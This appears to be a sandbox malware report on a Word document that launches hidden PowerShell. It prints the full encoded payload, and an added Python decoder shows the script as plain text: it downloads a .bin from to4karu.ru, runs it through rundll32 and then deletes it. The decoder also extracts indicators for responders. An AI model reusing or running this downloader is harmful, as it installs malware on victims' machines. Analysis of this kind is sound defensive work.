c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1252"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e 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C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2356"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e 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C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2444"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e 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C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2792"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZ
QBxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAHsACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgBjAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAiACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZ
ABjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2904"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZ
QBxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAHsACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgBjAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAiACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZ
ABjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
2932"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e 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C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3240"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e 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C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
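What follows is an added example, not code from the report, from ANY.RUN, or from the sample, showing how to turn the -e argument in the rows above into something readable: decode the Base64/UTF-16LE text, drop the padding lines (string assignments to variables that are never read again), and pull out the indicators. SCRIPT is the decoded body as transcribed from the report's payload, with most of the throw-away assignments and the two helper functions that contain nothing else omitted for length; ENCODED is re-encoded from it so the example runs offline, and decoding the report's own string with decode_encoded_command gives the unabridged text. The function names are this example's own.

```python
"""
Added example, not part of the ANY.RUN report: decode the -e argument of the
powershell.exe rows above, strip the padding assignments, and extract IOCs.
"""
import base64
import re

# Body of the -e payload as decoded from the report's Base64 (UTF-16LE). To
# keep the example short, most of the throw-away string assignments and the
# two helper functions that hold nothing else are omitted; every line that
# carries control flow or an indicator is verbatim.
SCRIPT = r'''###xlettrlpwibs
$mgziezdsnsjz = "rtsuzllfbjdjl";
$iostbohzlsk="yfafa";
$gkiavpuk=7;For ($jafkcgzdabfybyrhlyzmr=0; $jafkcgzdabfybyrhlyzmr -le 21; $jafkcgzdabfybyrhlyzmr++) {$gkiavpuk= (92 * $jafkcgzdabfybyrhlyzmr)}
$xtnkyxypeazsj=$env:userprofile+"\"+$mgziezdsnsjz+".bin";
$aqfwtipfau="jhuxmtqtjpjrdb";
$uumhubdkj="http://to4karu.ru/lierhgiojsgiouvbjnkfeiubg.bin";
$sbxhqgfjfzqymz = $ckdnjtcnmfpbn;
Function dwnld{
$etsbsflxm="vtcssztmroltb";
While ($sbxhqgfjfzqymz -eq $ckdnjtcnmfpbn) {
try{
$dipdizslzc=&("new-object") net.webclient;
$dipdizslzc."DownloadFile"($uumhubdkj, $xtnkyxypeazsj);
If ((.("Get-Item") $xtnkyxypeazsj)."length" -ge 102107) {
$sbxhqgfjfzqymz = $ohzdrrosilenxd;
Start-Process -FilePath "rundll32.exe" -Args "$xtnkyxypeazsj, DllRegisterServer";
delf;
exit;
}
}catch{
$abnezroqkhzwtu="jsjnipr";
}
sleep -s 5;
}}
Function delf{
try{
sleep -s 10;
Remove-Item -ErrorAction Stop -Path $xtnkyxypeazsj;
}catch{
delf;
}}dwnld;
'''

# Re-encoded here exactly the way powershell.exe -e expects it (Base64 over
# UTF-16LE) so the example runs offline; the report's string decodes the same way.
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii")

VAR = re.compile(r"\$(?!env\b)(\w+)")  # $name, but not $env:...


def decode_encoded_command(b64):
    """Decode a -e/-EncodedCommand argument. Whitespace is removed first because
    report extractors wrap long values across lines, and Base64 padding is
    restored because some tools drop the trailing '='."""
    b64 = re.sub(r"\s+", "", b64)
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-16-le")


def strip_junk(script):
    """Drop the padding: the leading '#' line and any line whose variables
    appear nowhere else in the script (so the value can never be read)."""
    lines = script.splitlines()
    kept = []
    for i, line in enumerate(lines):
        if line.startswith("#"):
            continue
        names = set(VAR.findall(line))
        rest = "\n".join(lines[:i] + lines[i + 1:])
        if names and not any(re.search(r"\$%s\b" % re.escape(n), rest) for n in names):
            continue
        kept.append(line)
    return "\n".join(kept)


def extract_iocs(script):
    """What a responder needs: payload URL, drop path, the minimum size the
    loader demands before running the file, the launcher, and the sleeps."""
    literals = dict(re.findall(r'\$(\w+)\s*=\s*"([^"]*)"', script))
    url = re.search(r'https?://[^\s"\']+', script)
    drop = re.search(r'\$env:userprofile\+"\\"\+\$(\w+)\+"([^"]*)"', script)
    size = re.search(r'-ge\s+(\d+)', script)
    launch = re.search(r'Start-Process\s+-FilePath\s+"([^"]+)"\s+-Args\s+"\$\w+,\s*(\w+)"', script)
    return {
        "url": url.group(0) if url else None,
        "drop_path": "%USERPROFILE%\\" + literals.get(drop.group(1), "?") + drop.group(2) if drop else None,
        "min_size": int(size.group(1)) if size else None,
        "launcher": (launch.group(1), launch.group(2)) if launch else None,
        "sleep_seconds": [int(s) for s in re.findall(r"sleep\s+-s\s+(\d+)", script)],
    }


def analyze(b64):
    """Full pipeline: decode, de-junk, extract. Returns (clean_script, iocs)."""
    clean = strip_junk(decode_encoded_command(b64))
    return clean, extract_iocs(clean)


if __name__ == "__main__":
    clean, iocs = analyze(ENCODED)
    print(clean)
    for key, value in iocs.items():
        print(f"{key}: {value}")
```

strip_junk keeps any line that shares a variable with another line, so the loop guard `$sbxhqgfjfzqymz = $ckdnjtcnmfpbn` survives (both variables are never assigned a value, so both are $null and the While condition is always true; the only way out is the `exit` after a successful launch). The size threshold belongs in the IOC record as well: a sinkhole response or error page smaller than 102107 bytes is downloaded but never executed, and the loop simply tries again.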
Total events
3 646
Read events
2 409
Write events
1 099
Delete events
138

Modification events

All ten registry writes listed come from WINWORD.EXE (PID 4004); none of the writes shown come from powershell.exe. The Resiliency\StartupItems value is Word's own crash-recovery bookkeeping for the item it is loading, and the EnabledLanguages values are Office language settings; neither is persistence created by the document.

  • PID 4004 WINWORD.EXE | Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | Operation: write | Name: u`5 | Value: 75603500A40F0000010000000000000000000000
  • PID 4004 WINWORD.EXE | Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | Operation: write | Name: 1033 | Value: Off
  • PID 4004 WINWORD.EXE | Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | Operation: write | Name: 1041 | Value: Off
  • PID 4004 WINWORD.EXE | Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | Operation: write | Name: 1046 | Value: Off
  • PID 4004 WINWORD.EXE | Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | Operation: write | Name: 1036 | Value: Off
